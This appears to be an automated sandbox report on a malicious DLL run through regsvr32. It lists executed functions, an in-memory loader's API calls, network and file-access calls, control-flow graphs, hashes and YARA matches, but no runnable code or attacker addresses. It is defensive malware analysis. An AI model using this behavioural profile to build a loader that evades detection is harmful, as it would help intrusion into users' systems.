                                                                                                                                execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3933 18001c58a 3930->3933 3932 18001c948 3932->3924 3933->3932 3948 180003598 3933->3948 3952 18000ac48 3933->3952 3956 180025dac 3933->3956 3960 1800097c0 3933->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3947 1800046ec 3944->3947 3945 180004982 3945->3943 3946 180004945 Process32FirstW 3946->3947 3947->3945 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3933 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3933 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3933 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3933 3963->3961 3966 18001ed7a 3964->3966 3967 18001f06b 3966->3967 3968 18000fb00 3966->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3966 3970->3969 3972 180015ea5 3971->3972 3973 180015f3b CreateThread 3972->3973 3973->3959 3974 180015e2c 3975 180015ea5 3974->3975 3976 180015f3b CreateThread 3975->3976 3998 18001496c 4001 1800149ce 3998->4001 3999 1800152ba 4000 18000fb00 CreateFileW 4000->4001 4001->3999 4001->4000 3977 180024d80 3979 180024eed 3977->3979 3978 1800250bd 3979->3978 3981 180019a30 3979->3981 3982 180019aa4 3981->3982 3983 180019b2a GetVolumeInformationW 3982->3983 3983->3978 3984 18000fb00 3986 18000fb80 3984->3986 3985 18000fc15 CreateFileW 3986->3985 3987 4f0000 3988 4f0183 3987->3988 3989 4f043e VirtualAlloc 3988->3989 3993 4f0462 3989->3993 3990 4f0a7b 3991 4f0531 GetNativeSystemInfo 3991->3990 3992 4f056d VirtualAlloc 3991->3992 3997 4f058b 3992->3997 3993->3990 3993->3991 3994 4f0a00 3994->3990 3995 4f0a56 RtlAddFunctionTable 3994->3995 3995->3990 3996 4f09d9 VirtualProtect 3996->3997 3997->3994 3997->3996 3997->3997

                                                                                                                                Executed Functions

                                                                                                                                Function 004F0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 4f0000-4f0460 call 4f0aa8 * 2 VirtualAlloc 22 4f048a-4f0494 0->22 23 4f0462-4f0466 0->23 26 4f049a-4f049e 22->26 27 4f0a91-4f0aa6 22->27 24 4f0468-4f0488 23->24 24->22 24->24 26->27 28 4f04a4-4f04a8 26->28 28->27 29 4f04ae-4f04b2 28->29 29->27 30 4f04b8-4f04bf 29->30 30->27 31 4f04c5-4f04d2 30->31 31->27 32 4f04d8-4f04e1 31->32 32->27 33 4f04e7-4f04f4 32->33 33->27 34 4f04fa-4f0507 33->34 35 4f0509-4f0511 34->35 36 4f0531-4f0567 GetNativeSystemInfo 34->36 37 4f0513-4f0518 35->37 36->27 38 4f056d-4f0589 VirtualAlloc 36->38 39 4f051a-4f051f 37->39 40 4f0521 37->40 41 4f058b-4f059e 38->41 42 4f05a0-4f05ac 38->42 43 4f0523-4f052f 39->43 40->43 41->42 44 4f05af-4f05b2 42->44 43->36 43->37 46 4f05b4-4f05bf 44->46 47 4f05c1-4f05db 44->47 46->44 48 4f05dd-4f05e2 47->48 49 4f061b-4f0622 47->49 52 4f05e4-4f05ea 48->52 50 4f06db-4f06e2 49->50 51 4f0628-4f062f 49->51 54 4f06e8-4f06f9 50->54 55 4f0864-4f086b 50->55 51->50 53 4f0635-4f0642 51->53 56 4f05ec-4f0609 52->56 57 4f060b-4f0619 52->57 53->50 60 4f0648-4f064f 53->60 61 4f0702-4f0705 54->61 58 4f0917-4f0929 55->58 59 4f0871-4f087f 55->59 56->56 56->57 57->49 57->52 62 4f092f-4f0937 58->62 63 4f0a07-4f0a1a 58->63 64 4f090e-4f0911 59->64 65 4f0654-4f0658 60->65 66 4f06fb-4f06ff 61->66 67 4f0707-4f070a 61->67 69 4f093b-4f093f 62->69 88 4f0a1c-4f0a27 63->88 89 4f0a40-4f0a4a 63->89 64->58 68 4f0884-4f08a9 64->68 70 4f06c0-4f06ca 65->70 66->61 71 4f070c-4f071d 67->71 72 4f0788-4f078e 67->72 94 4f08ab-4f08b1 68->94 95 4f0907-4f090c 68->95 75 4f09ec-4f09fa 69->75 76 4f0945-4f095a 69->76 73 4f06cc-4f06d2 70->73 74 4f065a-4f0669 70->74 77 4f071f-4f0720 71->77 78 4f0794-4f07a2 71->78 72->78 73->65 80 4f06d4-4f06d5 73->80 84 4f066b-4f0678 74->84 85 4f067a-4f067e 74->85 75->69 86 4f0a00-4f0a01 75->86 82 4f095c-4f095e 76->82 83 4f097b-4f097d 76->83 87 4f0722-4f0784 77->87 90 4f085d-4f085e 78->90 91 4f07a8 78->91 80->50 96 4f096e-4f0979 82->96 97 4f0960-4f096c 82->97 99 4f097f-4f0981 83->99 100 4f09a2-4f09a4 83->100 98 4f06bd-4f06be 84->98 101 4f068c-4f0690 85->101 102 4f0680-4f068a 85->102 86->63 87->87 103 4f0786 87->103 104 4f0a38-4f0a3e 88->104 92 4f0a4c-4f0a54 89->92 93 4f0a7b-4f0a8e 89->93 90->55 105 4f07ae-4f07d4 91->105 92->93 107 4f0a56-4f0a79 RtlAddFunctionTable 92->107 93->27 116 4f08bb-4f08c8 94->116 117 4f08b3-4f08b9 94->117 95->64 108 4f09be-4f09bf 96->108 97->108 98->70 109 4f0989-4f098b 99->109 110 4f0983-4f0987 99->110 114 4f09ac-4f09bb 100->114 115 4f09a6-4f09aa 100->115 112 4f06a5-4f06a9 101->112 113 4f0692-4f06a3 101->113 111 4f06b6-4f06ba 102->111 103->78 104->89 106 4f0a29-4f0a35 104->106 126 4f07d6-4f07d9 105->126 127 4f0835-4f0839 105->127 106->104 107->93 122 4f09c5-4f09cb 108->122 109->100 120 4f098d-4f098f 109->120 110->108 111->98 112->98 121 4f06ab-4f06b3 112->121 113->111 114->108 115->108 124 4f08ca-4f08d1 116->124 125 4f08d3-4f08e5 116->125 123 4f08ea-4f08fe 117->123 128 4f0999-4f09a0 120->128 129 4f0991-4f0997 120->129 121->111 130 4f09cd-4f09d3 122->130 131 4f09d9-4f09e9 VirtualProtect 122->131 123->95 142 4f0900-4f0905 123->142 124->124 124->125 125->123 133 4f07db-4f07e1 126->133 134 4f07e3-4f07f0 126->134 135 4f083b 127->135 136 4f0844-4f0850 127->136 128->122 129->108 130->131 131->75 138 4f0812-4f082c 133->138 139 4f07fb-4f080d 134->139 140 4f07f2-4f07f9 134->140 135->136 136->105 141 4f0856-4f0857 136->141 138->127 144 4f082e-4f0833 138->144 139->138 140->139 140->140 141->90 142->94 144->126
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.757827671.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_4f0000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction ID: 275d8cc3aa0bbb33c166530e3b621a48d89386fa4ef8b27a7a29691bbd7e2bc7
                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction Fuzzy Hash: 7372D870518B4C8BDB19DF18C8856BAB7E1FB94305F10562EE9CBC7212DB38D546CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000D26C Relevance: 7.9, Strings: 6, Instructions: 361COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$Ec;$J$^c$^c$n
                                                                                                                                • API String ID: 0-2929744921
                                                                                                                                • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                                                                                • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800046A8 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 5IF$P)#
                                                                                                                                • API String ID: 0-1025399686
                                                                                                                                • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                                                                                • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001CEC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ConnectInternet
                                                                                                                                • String ID: :G?$C
                                                                                                                                • API String ID: 3050416762-1225920220
                                                                                                                                • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                                                                                • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000FB00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID: gF\
                                                                                                                                • API String ID: 823142352-1982329323
                                                                                                                                • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                                                                                • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000A4FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpOpenRequest
                                                                                                                                • String ID: :G?
                                                                                                                                • API String ID: 1984915467-1508054202
                                                                                                                                • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                                                                                • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180012B50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InternetOpen
                                                                                                                                • String ID: :G?
                                                                                                                                • API String ID: 2038078732-1508054202
                                                                                                                                • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                                • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180015E2C Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                                • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180019A30 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                                • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%